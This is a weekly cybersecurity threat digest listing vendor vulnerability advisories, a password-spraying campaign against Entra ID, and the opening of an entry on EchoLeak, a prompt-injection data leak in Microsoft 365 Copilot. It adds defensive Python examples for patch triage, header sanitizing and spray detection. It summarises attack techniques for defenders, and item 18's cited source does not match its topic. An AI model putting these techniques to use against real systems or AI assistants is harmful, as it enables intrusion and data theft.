Weekly Threat Landscape Digest – Week 25

This week’s cyber threat landscape highlights a sharp rise in zero-day exploit attempts, sophisticated phishing campaigns, and the active exploitation of unpatched vulnerabilities across multiple sectors. Threat actors are demonstrating increased precision and adaptability, leveraging open-source frameworks and legitimate services to evade detection. In light of these developments, it is critical for organizations to enhance patch and vulnerability management processes, strengthen threat detection and real-time monitoring capabilities, and maintain continuous security visibility across endpoints and networks. Equally important are ongoing employee awareness programs, timely access to actionable threat intelligence, and a well-tested incident response plan to ensure rapid containment and recovery from emerging threats. These measures, taken together, form a resilient cybersecurity posture against the evolving tactics of adversaries.

  1. Command Injection Vulnerability in Palo Alto Networks PAN-OS (CVE-2025-4230)

A medium-severity command injection vulnerability (CVE-2025-4230) has been identified in Palo Alto Networks PAN-OS. The flaw allows authenticated administrators with CLI access to bypass system restrictions and execute arbitrary commands as the root user. Successful exploitation may lead to full system compromise, data exfiltration, or service disruption.

Severity: Medium (CVSS 5.7)
Affected Component: PAN-OS CLI
Impact: Root-level command execution, privilege escalation

Affected Versions:

  • PAN-OS 11.2.0 through 11.2.5
  • PAN-OS 11.1.0 through 11.1.9
  • PAN-OS 10.2.0 through 10.2.13
  • PAN-OS 10.1.0 through 10.1.14
  • All older unsupported versions

Fixed Versions:

  • PAN-OS 11.2.6 or later
  • PAN-OS 11.1.10 or later
  • PAN-OS 10.2.14 or later
  • PAN-OS 10.1.14-h15 or later

Recommendations:
Organizations should upgrade to the latest fixed versions immediately. Monitoring of administrative activities, implementation of least-privilege access for CLI users, and regular log review are also advised to detect potential abuse.

Reference:
https://security.paloaltonetworks.com/CVE-2025-4230
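The PAN-OS fixed-version list above has one trap for automated patch tracking: 10.1.14 is affected while 10.1.14-h15 is fixed, so a version comparison that ignores the hotfix suffix reports a vulnerable firewall as patched. The following is an added example (not Palo Alto Networks tooling, and not part of the original digest) that parses the hotfix suffix and triages a constructed inventory against the fixed releases listed in this entry; hostnames and installed versions are made up.

```python
from __future__ import annotations
import re

# Fixed releases per PAN-OS train, taken from the digest entry above
# (constructed lookup table for this example, not Palo Alto's own tooling).
PANOS_FIXED = {
    "11.2": "11.2.6",
    "11.1": "11.1.10",
    "10.2": "10.2.14",
    "10.1": "10.1.14-h15",
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(text: str) -> tuple[int, int, int, int]:
    """Parse 'MAJOR.MINOR.PATCH[-hN]' into a comparable tuple.

    A missing hotfix suffix counts as h0, so 10.1.14 sorts below 10.1.14-h15.
    This is exactly the case where a plain 'MAJOR.MINOR.PATCH' comparison would
    wrongly report an affected 10.1.14 box as fixed."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {text!r}")
    major, minor, patch, hotfix = m.groups()
    return (int(major), int(minor), int(patch), int(hotfix or 0))


def is_fixed(installed: str, fixed_by_train: dict[str, str] | None = None) -> bool:
    """True if `installed` is at or above the fixed release for its train.

    Trains absent from the table (e.g. 9.x) are unsupported and reported as
    not fixed, matching the advisory's 'all older unsupported versions'."""
    table = PANOS_FIXED if fixed_by_train is None else fixed_by_train
    v = parse_panos_version(installed)
    fixed = table.get(f"{v[0]}.{v[1]}")
    return fixed is not None and v >= parse_panos_version(fixed)


def triage(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Split an inventory {hostname: version} into fixed / needs-upgrade buckets."""
    result: dict[str, list[str]] = {"fixed": [], "needs_upgrade": []}
    for host, version in sorted(inventory.items()):
        result["fixed" if is_fixed(version) else "needs_upgrade"].append(host)
    return result


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and versions are made up.
    sample = {
        "fw-dc1": "10.1.14",
        "fw-dc2": "10.1.14-h15",
        "fw-branch": "11.1.9",
        "fw-lab": "9.1.17",
        "fw-new": "11.2.6",
    }
    for bucket, hosts in triage(sample).items():
        print(f"{bucket}: {', '.join(hosts)}")
```

The same parse-then-compare pattern applies to the other entries in this digest whose fixed builds carry suffixes (NetScaler's `14.1-43.56` style, Veeam's build numbers); only the regular expression changes.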

  2. Reflected File Download Vulnerability in Spring Framework (CVE-2025-41234)

A medium-severity vulnerability (CVE-2025-41234) has been identified in the Spring Framework that may allow attackers to execute malicious code through a reflected file download (RFD) attack. The issue arises when the Content-Disposition header is set using a non-ASCII charset and the filename is based on unsanitized user input.

Severity: Medium (CVSS 6.5)
Impact: Reflected File Download (RFD), arbitrary code execution
Attack Vector: User tricked into downloading a malicious file

Affected Versions:

  • Spring Framework 6.2.x prior to 6.2.8
  • Spring Framework 6.1.x prior to 6.1.21
  • Spring Framework 6.0.x prior to 6.0.29

Fixed Versions:

  • 6.2.8 (OSS)
  • 6.1.21 (OSS)
  • 6.0.29 (Commercial)

Recommendations:
Organizations using affected Spring Framework versions should upgrade to the latest fixed releases. Additionally, developers should ensure proper sanitization of user input when generating file download responses to mitigate similar RFD risks.

Reference:
https://spring.io/security/cve-2025-41234
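The recommendation to sanitize user input before it reaches a Content-Disposition header is easy to state and easy to get wrong. The following added example (written here in Python as a language-neutral illustration; it is not Spring's own fix and does not reproduce the patched code) shows the risky pattern beside a hardened builder: it drops path components and control characters, removes the characters that can close the quoted string or add header parameters, forces the extension onto an allow-list so the download can never become a script file, and carries the full Unicode name only in a percent-encoded RFC 5987 `filename*` parameter. The extension allow-list and the endpoint it guards are assumptions for the example.

```python
from __future__ import annotations
import re
from urllib.parse import quote

# Extensions this (hypothetical) download endpoint is willing to serve.
ALLOWED_EXTENSIONS = {"csv", "pdf", "txt", "png"}


def naive_content_disposition(filename: str) -> str:
    """The risky pattern: a user-supplied name dropped straight into the header."""
    return f'attachment; filename="{filename}"'


def safe_content_disposition(user_name: str,
                             allowed: set[str] = ALLOWED_EXTENSIONS) -> str:
    """Build a Content-Disposition value from untrusted input.

    Defences applied:
      * path separators are dropped (only the last path segment is kept);
      * non-printable characters (CR/LF header splitting), quotes, ';' and '%'
        are removed so the name cannot close the quoted string or add parameters;
      * the extension is forced onto an allow-list, so an attacker cannot turn
        the response into e.g. a .bat or .cmd download;
      * the ASCII 'filename' is reduced to a safe character set, while the full
        Unicode name travels in RFC 5987 'filename*' percent-encoded, never raw.
    """
    name = user_name.replace("\\", "/").rsplit("/", 1)[-1]
    name = "".join(ch for ch in name if ch.isprintable() and ch not in '";%')
    stem, _, ext = name.rpartition(".")
    if not stem or ext.lower() not in allowed:
        # Unknown or attacker-chosen extension: keep the whole name as the stem
        # and append a harmless extension instead.
        stem, ext = (name or "download").rstrip(". ") or "download", "txt"
    ascii_stem = re.sub(r"[^A-Za-z0-9._ -]", "_", stem).strip() or "download"
    ascii_name = f"{ascii_stem}.{ext}"
    unicode_name = f"{stem}.{ext}"
    return (f'attachment; filename="{ascii_name}"; '
            f"filename*=UTF-8''{quote(unicode_name, safe='')}")


if __name__ == "__main__":
    # Constructed inputs showing each defence in turn.
    for candidate in ["report.csv", 'x";y.bat', "rapport été.pdf",
                      "a.csv\r\nSet-Cookie: x", "../../etc/passwd"]:
        print(repr(candidate), "->", safe_content_disposition(candidate))
```

Note that the extension allow-list is what actually defeats reflected file download: even a perfectly escaped header still hands the user an executable if the attacker gets to pick `.bat`.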

  3. Multiple Vulnerabilities in Apache Tomcat (CVE-2025-48976, CVE-2025-48988, CVE-2025-49124, CVE-2025-49125)

Multiple vulnerabilities have been identified in Apache Tomcat that could be exploited to cause denial-of-service (DoS), bypass security constraints, and abuse the Windows installer. Two of the issues are rated high severity and could disrupt services by exhausting system memory.

CVE-2025-48976 – Denial of Service via Multipart Header Overload
Severity: High
A malicious request with numerous multipart headers can exhaust system memory, leading to a denial of service.

CVE-2025-48988 – Multipart Upload Abuse
Severity: High
Flooding the server with multipart requests can exhaust memory resources, also resulting in a DoS condition.

CVE-2025-49124 – Windows Installer Side-Loading
Severity: Low
On Windows, the Tomcat installer invokes icacls.exe without specifying the full path, introducing a potential side-loading risk if a malicious executable is placed earlier in the system path.

CVE-2025-49125 – Security Constraint Bypass via Pre/PostResources
Severity: Medium
Applications using PreResources or PostResources mounted outside the root directory may inadvertently expose resources, allowing attackers to bypass security constraints.

Fixed Versions:

  • Apache Tomcat 11.0.8 or later
  • Apache Tomcat 10.1.42 or later
  • Apache Tomcat 9.0.106 or later

Recommendations:
Organizations using affected versions of Apache Tomcat should immediately upgrade to the corresponding fixed versions. Regularly audit server configuration, avoid resource exposure outside application root, and validate system path settings on Windows deployments.

References:
https://lists.apache.org/thread/w7dbnfyqn1yc05kbqqbbyct7wbomv7lf
https://lists.apache.org/thread/z2d63tflwvqvdg3crz8d1sy2v3xsr4n8
https://lists.apache.org/thread/khdh7y3y1wogjocrz8jy8mmqzmgc9y5o
https://lists.apache.org/thread/0jwb3d3sjyfk5m6xnnj7h9m7ngxz23db

  4. Critical Remote Code Execution Vulnerability in Veeam Backup & Replication (CVE-2025-23121)

A critical vulnerability (CVE-2025-23121) has been identified in Veeam Backup & Replication, allowing a remote authenticated domain user to execute arbitrary code on domain-joined backup servers. The flaw scores 9.9 (Critical) on the CVSS scale and could enable full system compromise, lateral movement, and potential ransomware staging in enterprise environments.

CVE-2025-23121 – Remote Code Execution on Backup Server

  • Severity: Critical
  • CVSS v3.0 Score: 9.9
  • Impact: Remote code execution, system compromise
  • Affected Versions: Veeam Backup & Replication 12.3.1.1139 and all earlier version 12 builds
  • Fixed Version: 12.3.2 (build 12.3.2.3617)

Other Associated Vulnerabilities

CVE-2025-24286 – Backup Job Manipulation Leading to Code Execution

  • Severity: High
  • CVSS v3.1 Score: 7.2
  • Affected Versions: Veeam Backup & Replication 12.3.1.1139 and earlier
  • Fixed Version: 12.3.2 (build 12.3.2.3617)

CVE-2025-24287 – Local Privilege Escalation via Insecure Directory Permissions

  • Severity: Medium
  • CVSS v3.1 Score: 6.1
  • Affected Product: Veeam Agent for Microsoft Windows 6.3.1.1074 and all earlier version 6 builds
  • Fixed Version: 6.3.2 (build 6.3.2.1205)

Recommendations:

Organizations using Veeam products are strongly advised to upgrade to the latest patched versions immediately. Monitor domain user activity on backup servers and apply defense-in-depth strategies to reduce lateral movement risk. Ensure access to backup infrastructure is tightly controlled and logged.

Reference:
https://www.veeam.com/kb4743

 

  5. High-Severity Vulnerabilities Patched in Google Chrome (CVE-2025-6191, CVE-2025-6192)

Google has released security updates for the Chrome browser addressing multiple high-severity vulnerabilities. Exploitation of these flaws could enable remote attackers to execute arbitrary code or cause memory corruption by simply luring users to malicious websites.

Key Vulnerabilities:

CVE-2025-6191 – Integer Overflow in V8

  • Severity: High
  • An integer overflow in the V8 JavaScript engine could allow memory manipulation during script execution. Exploitation may lead to arbitrary code execution or memory corruption.

CVE-2025-6192 – Use-After-Free in Profiler

  • Severity: High
  • A use-after-free issue in Chrome’s Profiler component may result in memory corruption or crashes exploitable for code execution.

Fixed Versions:

  • Desktop Stable Channel:
    • Chrome 137.0.7151.119/.120 for Windows and Mac
    • Chrome 137.0.7151.119 for Linux
  • Android Stable Channel:
    • Chrome 137.0.7151.115
  • Extended Stable Updates (Desktop):
    • Chrome 136.0.7103.177 for Windows and Mac

Recommendations:

Users and enterprises should ensure all Chrome installations across platforms are updated to the latest available version. Consider enabling automatic updates and monitoring browser security configurations to reduce exposure to active threats.

References:
https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop_17.html
https://chromereleases.googleblog.com/

 

  6. Critical Vulnerabilities in NetScaler ADC and NetScaler Gateway (CVE-2025-5777, CVE-2025-5349)

Two vulnerabilities, rated Critical and High respectively, have been identified in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway). They could allow attackers to gain unauthorized access to management interfaces or expose sensitive information through memory overread attacks.

CVE-2025-5777 – Memory Overread in Gateway Configurations

  • Severity: Critical
  • CVSS Base Score: 9.3
  • Description: Exploitable when NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or as an AAA virtual server. Insufficient input validation could lead to memory overreads and data disclosure.

CVE-2025-5349 – Improper Access Control on Management Interface

  • Severity: High
  • CVSS Base Score: 8.7
  • Description: An attacker with access to NSIP, Cluster Management IP, or local GSLB Site IP could bypass access controls and gain unauthorized administrative access.

Affected Versions:

  • NetScaler ADC and Gateway 14.1 before 14.1-43.56
  • NetScaler ADC and Gateway 13.1 before 13.1-58.32
  • NetScaler ADC 13.1-FIPS and NDcPP before 13.1-37.235
  • NetScaler ADC 12.1-FIPS before 12.1-55.328
  • NetScaler ADC and Gateway 12.1 and 13.0 (EOL – upgrade mandatory)

Fixed Versions:

  • NetScaler ADC and Gateway 14.1-43.56 and later
  • NetScaler ADC and Gateway 13.1-58.32 and later
  • NetScaler ADC 13.1-FIPS / NDcPP 13.1-37.235 and later
  • NetScaler ADC 12.1-FIPS 12.1-55.328 and later

Recommendations:

All affected organizations should upgrade to the fixed versions immediately. Enforce strict access control to NSIP and management interfaces. Monitor network traffic for any suspicious attempts to access administrative ports or virtual server paths.

Reference:
https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420

  7. Actively Exploited Privilege Escalation Vulnerability in Linux Kernel (CVE-2023-0386)

A critical local privilege escalation vulnerability in the Linux kernel’s OverlayFS subsystem, tracked as CVE-2023-0386, is being actively exploited in the wild. The flaw stems from improper handling of setuid/setgid bits during file copy-up operations between mounts, enabling unprivileged users to gain root-level access.

Vulnerability Overview:

  • CVE ID: CVE-2023-0386
  • Severity: High (CVSS v3.1 Score: 7.8)
  • Vulnerability Type: Local Privilege Escalation
  • Attack Vector: Local (requires unprivileged user access)
  • Affected Component: OverlayFS in Linux Kernel
  • Exploitation Status: Active exploitation confirmed
  • PoC: Publicly available; tested and confirmed on Ubuntu 22.04

Risk & Impact:

  • Attackers can escalate privileges from any local unprivileged account to root in seconds.
  • Particularly dangerous in environments using containers, user namespaces, shared hosting, or CI/CD systems.
  • Exploitation enables complete control over affected systems and lateral movement within networks.

Recommendations:

Organizations should immediately upgrade to a patched version of the Linux kernel. Where patching is delayed, limit access to untrusted users, disable user namespaces if not required, and audit systems for signs of privilege misuse.

Reference:
https://www.cve.org/CVERecord?id=CVE-2023-0386

 

  8. Critical Vulnerability in Cisco ClamAV (CVE-2025-20260, CVE-2025-20234)

Cisco has disclosed two vulnerabilities in the ClamAV antivirus engine, a widely used open-source solution for malware scanning in email systems, network gateways, storage platforms, and endpoint protection tools. The most critical flaw enables remote code execution (RCE) and has been assigned a CVSS score of 9.8.

CVE-2025-20260 – Heap-Based Buffer Overflow in PDF Scanner

  • Severity: Critical
  • CVSS Score: 9.8
  • Description: A heap-based buffer overflow vulnerability in the PDF scanning module that could lead to denial of service or arbitrary code execution under certain configurations.
  • Affected Versions: ClamAV 1.0.0 and later, before 1.4.3

CVE-2025-20234 – Memory Over-Read in UDF Scanner

  • Severity: Medium
  • CVSS Score: 5.3
  • Description: An over-read issue during Universal Disk Format (UDF) scanning could cause a denial-of-service condition.
  • Affected Versions: ClamAV 1.2.0 and later, before 1.4.3

Affected Versions:

  • General Users: All versions prior to 1.4.3
  • LTS Releases: All versions prior to 1.0.9

Fixed Versions:

  • ClamAV 1.4.3 (latest stable)
  • ClamAV 1.0.9 (long-term support)

Recommendations:

All users of ClamAV should immediately upgrade to the latest patched version (1.4.3) or LTS version (1.0.9) depending on deployment. Monitor security logs for signs of abnormal PDF or UDF scanning behavior and restrict file upload capabilities where feasible.

Reference:
https://blog.clamav.net/2025/06/clamav-143-and-109-security-patch.html

 

  9. Multiple Vulnerabilities Patched in GitLab CE/EE (CVE-2025-4278, CVE-2025-2254, CVE-2025-5121 & Others)

GitLab has released critical security updates for its Community Edition (CE) and Enterprise Edition (EE) to address multiple vulnerabilities ranging from account takeover and cross-site scripting (XSS) to denial-of-service (DoS) and information disclosure. Several of these issues carry high-severity CVSS scores above 8.0, warranting urgent patching.

Key High-Severity Vulnerabilities:

  • CVE-2025-4278 – HTML Injection on Search Page
    CVSS 8.7 (High) – Could lead to account takeover through malicious HTML injection.
  • CVE-2025-2254 – XSS in Snippet Viewer
    CVSS 8.7 (High) – Enables script execution in another user’s context.
  • CVE-2025-5121 – Unauthorized CI/CD Pipeline Injection (EE Ultimate only)
    CVSS 8.5 (High) – Malicious pipeline jobs could be injected across projects.
  • CVE-2025-0673 – DoS via Redirect Loop
    CVSS 7.5 (High) – Malformed redirects could exhaust memory and crash services.

Other Notable Vulnerabilities:

  • CVE-2025-1516 / CVE-2025-1478 – DoS via large webhook token or board names (CVSS 6.5)
  • CVE-2024-9512 – Repo cloning via sync delays (CVSS 5.3)
  • CVE-2025-5996 – DoS through malformed HTTP responses (CVSS 6.5)
  • CVE-2025-5195 – Unauthorized access to compliance frameworks (CVSS 4.3)
  • CVE-2025-5982 – IP restriction bypass (EE only) (CVSS 3.7)

Fixed Versions:

  • GitLab CE/EE:
    • 18.0.2
    • 17.11.4
    • 17.10.8

Recommendations:

Organizations using affected GitLab versions should upgrade immediately to the fixed releases. Regularly audit CI/CD jobs, enforce input sanitization, and monitor access control configurations to prevent exploitation.

Reference:
https://about.gitlab.com/releases/2025/06/11/patch-release-gitlab-18-0-2-released/

 

  10. Critical Vulnerabilities in VMware Tanzu Greenplum

VMware has patched multiple critical vulnerabilities in Tanzu Greenplum, affecting the database engine, PL/Container (Python & R), and related components. Exploitation may lead to RCE, privilege escalation, and data compromise.

  • Severity: Critical (CVSS up to 9.8)
  • Affected Components:
    • Greenplum Server: CVE-2025-1094, CVE-2024-10979, CVE-2024-7348
    • PL/Container (Python & R): CVE-2024-3596, CVE-2023-37920, GHSA advisories
    • Go Stdlib / Cluster Management: CVE-2025-22871
  • Fixed Version: VMware Tanzu Greenplum 7.5.0

Action Required:
Upgrade immediately to version 7.5.0. Review container usage and restrict access to vulnerable modules.

Reference:
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35843

  11. Remote Command Execution in Hikvision Wireless Access Points (CVE-2025-39240)

A high-severity RCE vulnerability (CVE-2025-39240) has been identified in several Hikvision Wireless Access Point models. The flaw allows authenticated attackers to execute arbitrary system commands via specially crafted packets, due to insufficient input validation.

  • CVSS v3.1 Score: 7.2 (High)
  • Impact: Remote Code Execution (RCE), device compromise
  • Access Requirement: Valid credentials required

Affected Models (Prior to Fixed Firmware):

  • DS-3WAP622G-SI
  • DS-3WAP623E-SI
  • DS-3WAP521-SI
  • DS-3WAP522-SI
  • DS-3WAP621E-SI
  • DS-3WAP622E-SI

Fixed Version:

  • Firmware version V1.1.6300 build250331 (R2263)

Recommendations:

Upgrade all affected Hikvision WAP devices to the latest fixed firmware. Audit device access controls and restrict management interface exposure.

Reference:
https://www.hikvision.com/en/support/cybersecurity/security-advisory/remote-command-execution-vulnerability-in-some-hikvision-wireless-access-point/

 

  12. Denial of Service in Cisco Meraki MX and Z Series VPN (CVE-2025-20271)

A high-severity DoS vulnerability (CVE-2025-20271) affects the Cisco AnyConnect VPN component of Meraki MX and Z Series devices. Unauthenticated attackers can trigger a service restart by sending crafted HTTPS requests, disrupting VPN connectivity.

  • CVSS v3.1 Score: 8.6 (High)
  • Impact: VPN session termination, connection denial
  • Attack Vector: Remote, unauthenticated
  • Root Cause: Improper variable initialization during SSL VPN setup

Affected Products:

  • MX Series: MX64/65 (only if on firmware 17.6+), MX67/68/75/84/85/95/100/105/250/450, vMX
  • Z Series: Z3, Z3C, Z4, Z4C
  • MX400/600: Affected but no patch available (End-of-Life)

Fixed Versions:

  • 18.1xx: 18.107.13
  • 18.2xx: 18.211.6
  • 19.1: 19.1.8
  • 16.2 / 17.x: Must migrate to a fixed version

Recommendations:

Upgrade to a fixed firmware version as soon as possible. Disable client certificate authentication if not required and monitor VPN services for abnormal resets.

Reference:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-meraki-mx-vpn-dos-sM5GCfm7

  13. Security Updates Across Atlassian Products (June 2025)

Atlassian has released multiple high-severity patches across its product line. Exploitation may lead to denial of service (DoS), improper authorization, and path traversal attacks.

Key CVEs & Affected Products:

  • CVE-2025-22228 – Improper Authorization (CVSS 7.4)
  • CVE-2025-24970, CVE-2024-57699, CVE-2025-31650 – DoS via dependencies (CVSS 7.5)
  • CVE-2024-38816 – Path Traversal (CVSS 7.5)

Fixed Versions:

  • Bamboo: 10.2.3, 9.6.14
  • Bitbucket: 9.6.2, 9.5.2, 8.19.18, 8.9.27
  • Confluence: 9.5.1, 9.2.5, 8.5.23
  • Crowd: 5.3.6, 6.3.1
  • Jira Software & Service Mgmt: 10.6.1, 10.3.6

Recommendations:

Update all Atlassian products to their respective patched versions. Prioritize instances exposed to external access and enforce access control policies.

Reference:
https://confluence.atlassian.com/security/security-bulletin-june-17-2025-1574012717.html

  14. RCE Vulnerability in BeyondTrust Remote Support & PRA (CVE-2025-5309)

A high-severity RCE vulnerability (CVE-2025-5309) has been identified in the chat functionality of BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The flaw stems from a Server-Side Template Injection (SSTI) that could allow unauthenticated attackers to execute code on the server in certain cases.

  • Severity: High
  • CVSS v4 Score: 8.6
  • Impact: Remote code execution via SSTI
  • CWE: CWE-94 – Code Injection
  • Exploit Status: No active exploitation reported (as of June 19, 2025)

Affected Versions:

  • RS: 24.2.2–24.2.4, 24.3.1–24.3.3, 25.1.1
  • PRA: 24.2.2–24.2.4, 24.3.1–24.3.3, 25.1.1

Fixed Versions:

  • RS: 24.3.4 and above or patched with HELP-10826-2
  • PRA: 25.1.2 and above or patched with HELP-10826-1 / HELP-10826-2

Recommendations:

Organizations using affected on-premise deployments should apply the appropriate patches immediately. Internet-exposed instances are at higher risk and should be prioritized.

Reference:
https://www.beyondtrust.com/trust-center/security-advisories/bt25-04

  15. Privilege Escalation in WordPress AI Engine Plugin (CVE-2025-5071)

A high-severity privilege escalation vulnerability (CVE-2025-5071) has been identified in the AI Engine plugin for WordPress, affecting versions prior to 2.8.4. Authenticated users with subscriber-level access can escalate privileges to gain full administrative control of the site.

  • CVSS Score: 8.8 (High)
  • Root Cause: Insufficient validation in can_access_mcp() and the mwai_allow_mcp filter when MCP and Dev Tools features are enabled
  • Impact: Full site takeover including plugin uploads, content modification, redirect injection, and admin control

Affected Versions:

  • AI Engine plugin versions 2.8.0 to 2.8.3

Fixed Version:

  • 2.8.4 and later

Recommendations:

  • Update the plugin to v2.8.4 or newer
  • Disable MCP and Dev Tools if not needed
  • Enforce strong admin authentication
  • Regularly audit user privileges and plugin settings
  • Monitor for unusual admin activity

References:
https://www.wordfence.com/blog/2025/06/100000-wordpress-sites-affected-by-privilege-escalation-via-mcp-in-ai-engine-wordpress-plugin/
https://nvd.nist.gov/vuln/detail/CVE-2025-5071

 

  16. UAE Cybersecurity Council Circular – Bolstering Defenses Amid Rising Threats

Amid escalating geopolitical tensions and increased global cyber activity, the UAE Cybersecurity Council has issued a circular urging all sectors to enhance their cyber defense posture. Organizations are advised to remain vigilant against phishing, DDoS attacks, and exploitation of unpatched vulnerabilities.

Key Recommendations:

  • Activate SOC & Increase Vigilance
    • Report any unusual activity promptly
    • Enable real-time alerting and continuous monitoring
  • Defend Against DDoS
    • Use anti-DDoS services from ISPs or security vendors
    • Verify configurations and response procedures
  • Patch & Harden Systems
    • Apply all critical patches
    • Focus on internet-facing and actively exploited vulnerabilities
  • Secure Identity & Access
    • Enforce MFA, especially for privileged accounts
    • Limit admin rights to essential users
  • Segment & Secure Critical Infrastructure
    • Implement network segmentation
    • Disable unnecessary ports and services
  • Update Incident Response Plans
    • Review escalation workflows
    • Conduct readiness exercises
  • Ensure Backup & Recovery Readiness
    • Maintain offline, encrypted backups
    • Test restore procedures regularly
  • Raise Awareness
    • Train staff on phishing and social engineering
    • Encourage reporting of suspicious activity

Reference:
https://assets.adgm.com/download/assets/20250615+-+Bolstering+Defenses+Against+Increased+Cyber+Threats.pdf/f0ecbda24a6c11f0a9e062f4f60e128f

  17. Threat Actor Abuses TeamFiltration for Entra ID Account Takeovers

Proofpoint researchers have identified a large-scale account takeover (ATO) campaign dubbed “UNK_SneakyStrike”, which exploits the TeamFiltration open-source framework to compromise Microsoft Entra ID (formerly Azure AD) accounts.

Key Findings:

  • Impact: Over 80,000 user accounts across ~100 cloud tenants targeted
  • Tool: TeamFiltration (open-source pentest tool built for Microsoft 365 attacks)
  • TTPs: Enumeration, password spraying via Microsoft Teams API
  • Persistence: Exploits OAuth misconfigurations, conditional access gaps, and refresh tokens
  • Data Exfiltration: Pulls chat logs, files, and contact lists from Teams and OneDrive

Attack Mechanics:

  • Uses rotating AWS regions for geo-distributed password spraying
  • Leverages Teams API for silent enumeration
  • Exploits family refresh tokens (FRTs) to access multiple Microsoft services once a foothold is established
  • Operates stealthily by mimicking legitimate traffic patterns via cloud-native APIs

Detection Challenges:

  • TeamFiltration blends in with normal user activity, making it harder to detect than traditional tools
  • Attacks often focus broadly on small tenants and selectively on larger ones

Recommendations:

  • Enforce MFA for all apps and users
  • Audit and correct conditional access policy gaps
  • Monitor for login anomalies and token abuse
  • Review behavioral IOCs linked to UNK_SneakyStrike campaigns

Reference:
https://www.darkreading.com/cloud-security/threat-actor-teamfiltration-entra-id-attacks
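"Monitor for login anomalies" is the actionable recommendation here, and the campaign's own TTPs suggest what to look for: one source trying many accounts a few times each (a spray), followed by a successful sign-in from that same source. The following added example (a generic heuristic written for this digest, not Proofpoint's detection logic and not TeamFiltration code) runs that logic over constructed sign-in events in a simplified Entra-like shape; the events, addresses and accounts are made up, and the thresholds are assumptions to tune per tenant.

```python
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta


def ev(ts: str, user: str, ip: str, result: str) -> dict:
    return {"ts": ts, "user": user, "ip": ip, "result": result}


# Constructed sign-in events (made up for this example, not real tenant data).
# 203.0.113.10 walks a user list with one guess each, then logs in as the one
# account whose password it got; 198.51.100.7 hammers a single account (brute
# force, not a spray); 192.0.2.5 is normal use.
EVENTS = [
    ev("2025-06-16T09:00:01Z", "alice@example.com", "203.0.113.10", "failure"),
    ev("2025-06-16T09:00:32Z", "bob@example.com", "203.0.113.10", "failure"),
    ev("2025-06-16T09:01:05Z", "carol@example.com", "203.0.113.10", "failure"),
    ev("2025-06-16T09:01:41Z", "dave@example.com", "203.0.113.10", "failure"),
    ev("2025-06-16T09:02:10Z", "erin@example.com", "203.0.113.10", "failure"),
    ev("2025-06-16T09:07:55Z", "erin@example.com", "203.0.113.10", "success"),
    ev("2025-06-16T09:03:00Z", "alice@example.com", "198.51.100.7", "failure"),
    ev("2025-06-16T09:03:10Z", "alice@example.com", "198.51.100.7", "failure"),
    ev("2025-06-16T09:03:20Z", "alice@example.com", "198.51.100.7", "failure"),
    ev("2025-06-16T09:03:30Z", "alice@example.com", "198.51.100.7", "failure"),
    ev("2025-06-16T09:04:00Z", "bob@example.com", "192.0.2.5", "success"),
]


def _parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_password_spray(events, window=timedelta(minutes=30),
                          min_users=5, max_per_user=2) -> dict[str, list[str]]:
    """Flag source IPs that fail against at least `min_users` distinct accounts
    inside `window` while trying each account at most `max_per_user` times.
    Many users with few guesses each is the spray signature, as opposed to a
    brute force that piles many guesses onto one account.
    Returns {ip: sorted targeted users}."""
    failures: dict[str, list[tuple[datetime, str]]] = defaultdict(list)
    for e in events:
        if e["result"] == "failure":
            failures[e["ip"]].append((_parse_ts(e["ts"]), e["user"]))
    hits: dict[str, list[str]] = {}
    for ip, attempts in failures.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Slide the window start forward so it spans at most `window`.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            per_user: dict[str, int] = defaultdict(int)
            for _, user in attempts[start:end + 1]:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                hits[ip] = sorted(per_user)
                break
    return hits


def detect_success_after_spray(events, spray_ips) -> list[str]:
    """Accounts that later authenticated successfully from a spraying IP are the
    ones to treat as compromised first (reset, revoke refresh tokens, review MFA)."""
    return sorted({e["user"] for e in events
                   if e["result"] == "success" and e["ip"] in spray_ips})


if __name__ == "__main__":
    sprays = detect_password_spray(EVENTS)
    print("spraying sources:", sprays)
    print("likely compromised:", detect_success_after_spray(EVENTS, sprays))
```

Because the campaign rotates AWS regions, a per-IP key will fragment a real spray across many sources; in production the same logic is usually keyed on ASN or cloud-provider range as well as on the individual address.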

  18. Threat Actor Abuses TeamFiltration for Microsoft Entra ID Account Takeovers

Campaign Name: UNK_SneakyStrike
Tool Abused: TeamFiltration (Open-source pentest framework)
Target: Microsoft Entra ID (formerly Azure AD)
Impact: Over 80,000 accounts across ~100 cloud tenants

Key Details:

  • Initial Vector: Password spraying and enumeration via Teams API
  • Infrastructure: AWS accounts rotating regions for stealth
  • Persistence: Misused conditional access gaps; bypassed MFA in Teams
  • Exfiltration: Extracted chat logs, files, and contacts from Teams & OneDrive
  • Stealth: Operates via legitimate APIs, blends in with user activity

Tactics & Techniques:

  • API Abuse: Microsoft Teams, OneDrive
  • Cloud-native APT: Bypasses security controls using valid credentials
  • Token Abuse: Family Refresh Tokens (FRTs) leveraged for lateral access
  • Access Strategy:
    • Targets all users in smaller tenants
    • Filters high-value users in large tenants

Recommended Actions:

  • Enforce MFA across all apps, especially Teams
  • Audit Conditional Access Policies
  • Monitor OAuth token usage and Teams/Graph API activity
  • Leverage behavioral analytics for anomaly detection

Source:
https://www.recordedfuture.com/research/predator-still-active-new-links-identified

 

  19. EchoLeak: Zero-Click AI Vulnerability in Microsoft 365 Copilot (CVE-2025-32711)

A critical zero-click vulnerability named EchoLeak has been discovered in Microsoft 365 Copilot, allowing attackers to exfiltrate sensitive data without user interaction via AI prompt injection.

  • CVE: CVE-2025-32711
